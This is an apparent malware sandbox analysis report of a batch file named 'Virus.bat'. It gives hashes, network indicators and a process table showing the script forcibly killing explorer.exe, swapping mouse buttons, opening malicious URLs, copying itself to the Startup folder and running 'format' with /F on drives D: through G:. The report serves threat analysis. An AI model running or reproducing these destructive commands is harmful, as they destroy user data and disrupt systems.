File name: | Virus.bat |
Full analysis: | https://app.any.run/tasks/a81e45c8-7c33-4167-bf80-90f8688c63a0 |
Verdict: | Malicious activity |
Analysis date: | May 21, 2022, 09:05:22 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Indicators: | |
MIME: | text/plain |
File info: | ASCII text, with CRLF line terminators |
MD5: | 94FD61CE02CADE547895C5C9D0A0BAC0 |
SHA1: | 313DED429034FBFC4567935BB91CC9A409066375 |
SHA256: | B3A13CDC76DEA743146238DE8432E0C8E5A8C8B7FB43793077AC92F8A1E1771B |
SSDEEP: | 12:IOfkVAvCestzPNHSuVM1t2GOestzF+r1Xjat2B8LSfDQg7BiZM7r9LpUOsyyzxMK:I4ABdtbwuVMtOdtBs1h1f37BOQjUOhyP |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2968 | C:\Windows\system32\cmd.exe /c ""C:\Users\admin\AppData\Local\Temp\Virus.bat" " | C:\Windows\system32\cmd.exe | Explorer.EXE | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3044 | msg * (Muhahaha) | C:\Windows\system32\msg.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Message Utility Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
1004 | taskkill /IM explorer.exe /f | C:\Windows\system32\taskkill.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Terminates Processes Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3948 | Rundll32 user32, SwapMouseButton | C:\Windows\system32\rundll32.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows host process (Rundll32) Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3516 | "C:\Program Files\Internet Explorer\iexplore.exe" http://www.evil-shit.de/ | C:\Program Files\Internet Explorer\iexplore.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Internet Explorer Version: 11.00.9600.16428 (winblue_gdr.131013-1700) | ||||
4068 | "C:\Program Files\Internet Explorer\iexplore.exe" http://www.akk.li/pics/anne/jpg | C:\Program Files\Internet Explorer\iexplore.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Internet Explorer Version: 11.00.9600.16428 (winblue_gdr.131013-1700) | ||||
2500 | format D:\ /F | C:\Windows\system32\format.com | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Disk Format Utility Exit code: 4 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
912 | format E:\ /F | C:\Windows\system32\format.com | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Disk Format Utility Exit code: 4 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
4084 | format F:\ /F | C:\Windows\system32\format.com | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Disk Format Utility Exit code: 4 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
1988 | format G:\ /F | C:\Windows\system32\format.com | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Disk Format Utility Exit code: 4 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
4068 | iexplore.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_711ED44619924BA6DC33E69F97E7FF63 | binary | |
MD5:0C01AD1C07F53ED1800743912B04D81A | SHA256:AFA786AAD42ACB61430DCC3801B6D2974511F809C60AC521C152B8F56BD66691 | |||
4068 | iexplore.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_711ED44619924BA6DC33E69F97E7FF63 | der | |
MD5:AC4726FEE26B5D7F5BC731F03E7D7E34 | SHA256:990F044CAB696ED00BBC2CB11C62BA52EE6D61F33AAFD5F78CD35EA3513D9C01 | |||
188 | iexplore.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\646C991C2A28825F3CC56E0A1D1E3FA9 | der | |
MD5:3523BFA7B3ACACA361AC9814166709AD | SHA256:CE82F93FDB091E30497236D7F04BB67F7008E8E4133D2A8445B531C16D13AA67 | |||
188 | iexplore.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_72BF6A27377E65244ED5348D2E81C743 | der | |
MD5:0D3D5D73E90D0F4349F5DD3436CF7552 | SHA256:46B9C4EEF9EB565AC4F655647A36462A84C31D7F8F6BA415B8DDF3B24AAEE9B3 | |||
188 | iexplore.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 | binary | |
MD5:3125F06B0098B6B1E22A7274222B4FA7 | SHA256:81500AE2010908B4122D44B628A7062F7849153F0A16D81EF186462E64C683A2 | |||
2968 | cmd.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Virus.bat | text | |
MD5:94FD61CE02CADE547895C5C9D0A0BAC0 | SHA256:B3A13CDC76DEA743146238DE8432E0C8E5A8C8B7FB43793077AC92F8A1E1771B | |||
4068 | iexplore.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776 | der | |
MD5:FA526918A211E850A6078FB1D00B2045 | SHA256:396B94C667643AFA59D155EF4D812DA6F4D67DD50CEC97194E1CA3A1B3ECE3FE | |||
188 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\5IWPIAR9\jpg[1].htm | html | |
MD5:CF4E529FEF1956DB6D128515AE7F0E63 | SHA256:EFEDEDAFCFF7BADBEF47409136A30304DB6EE9B910D632D6C5D2FC2355B89816 | |||
188 | iexplore.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\Low\DTMWROUK.txt | text | |
MD5:862CFB5EB276780CE61F13960102190E | SHA256:0347A565468FF2C96DA89BA4A22805526971C13ADCF36B2FD56A2B154A339B5A | |||
188 | iexplore.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\Low\6QB1NSOR.txt | text | |
MD5:9D69D3072D172891BD71F09E2CDC7CCB | SHA256:D7ED0941E9CE6E06E8E8A1E12AEF65EECCF14265DCA20A6768ED3B19C0750915 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2972 | iexplore.exe | GET | — | 62.143.36.236:80 | http://www.evil-shit.de/ | DE | — | — | unknown |
4068 | iexplore.exe | GET | 200 | 93.184.220.29:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D | US | der | 471 b | whitelisted |
188 | iexplore.exe | POST | 200 | 199.59.243.200:80 | http://www.akk.li/_fd | US | text | 2.30 Kb | malicious |
188 | iexplore.exe | GET | 200 | 199.59.243.200:80 | http://www.akk.li/pics/anne/jpg | US | html | 979 b | malicious |
4068 | iexplore.exe | GET | 200 | 199.59.243.200:80 | http://www.akk.li/favicon.ico | US | — | — | malicious |
188 | iexplore.exe | GET | 200 | 199.59.243.200:80 | http://www.akk.li/js/parking.2.88.1.js | US | html | 21.6 Kb | malicious |
188 | iexplore.exe | GET | 200 | 199.59.243.200:80 | http://www.akk.li/px.gif?ch=2&rn=7.611487305465162 | US | image | 42 b | malicious |
188 | iexplore.exe | GET | 200 | 172.217.16.131:80 | http://crl.pki.goog/gsr1/gsr1.crl | US | der | 1.61 Kb | whitelisted |
188 | iexplore.exe | GET | 200 | 142.250.181.227:80 | http://ocsp.pki.goog/gtsr1/ME4wTDBKMEgwRjAJBgUrDgMCGgUABBQwkcLWD4LqGJ7bE7B1XZsEbmfwUAQU5K8rJnEaK0gnhS9SZizv8IkTcT4CDQIDvFNZazTHGPUBUGY%3D | US | der | 724 b | whitelisted |
4068 | iexplore.exe | GET | 200 | 93.184.220.29:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEA8Ull8gIGmZT9XHrHiJQeI%3D | US | der | 1.47 Kb | whitelisted |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
188 | iexplore.exe | 209.197.3.8:80 | ctldl.windowsupdate.com | Highwinds Network Group, Inc. | US | whitelisted |
2972 | iexplore.exe | 62.143.36.236:80 | www.evil-shit.de | Liberty Global Operations B.V. | DE | unknown |
188 | iexplore.exe | 142.250.186.36:443 | www.google.com | Google Inc. | US | whitelisted |
188 | iexplore.exe | 142.250.181.227:80 | ocsp.pki.goog | Google Inc. | US | whitelisted |
3516 | iexplore.exe | 13.107.21.200:443 | www.bing.com | Microsoft Corporation | US | whitelisted |
188 | iexplore.exe | 199.59.243.200:80 | www.akk.li | — | US | malicious |
4068 | iexplore.exe | 13.107.21.200:443 | www.bing.com | Microsoft Corporation | US | whitelisted |
188 | iexplore.exe | 142.250.186.130:443 | partner.googleadservices.com | Google Inc. | US | whitelisted |
4068 | iexplore.exe | 199.59.243.200:80 | www.akk.li | — | US | malicious |
4068 | iexplore.exe | 93.184.220.29:80 | ocsp.digicert.com | MCI Communications Services, Inc. d/b/a Verizon Business | US | whitelisted |
Domain | IP | Reputation |
---|---|---|
www.evil-shit.de |
| unknown |
www.akk.li |
| malicious |
parking.bodiscdn.com |
| whitelisted |
fonts.googleapis.com |
| whitelisted |
www.google.com |
| whitelisted |
ctldl.windowsupdate.com |
| whitelisted |
ocsp.pki.goog |
| whitelisted |
api.bing.com |
| whitelisted |
www.bing.com |
| whitelisted |
ocsp.digicert.com |
| whitelisted |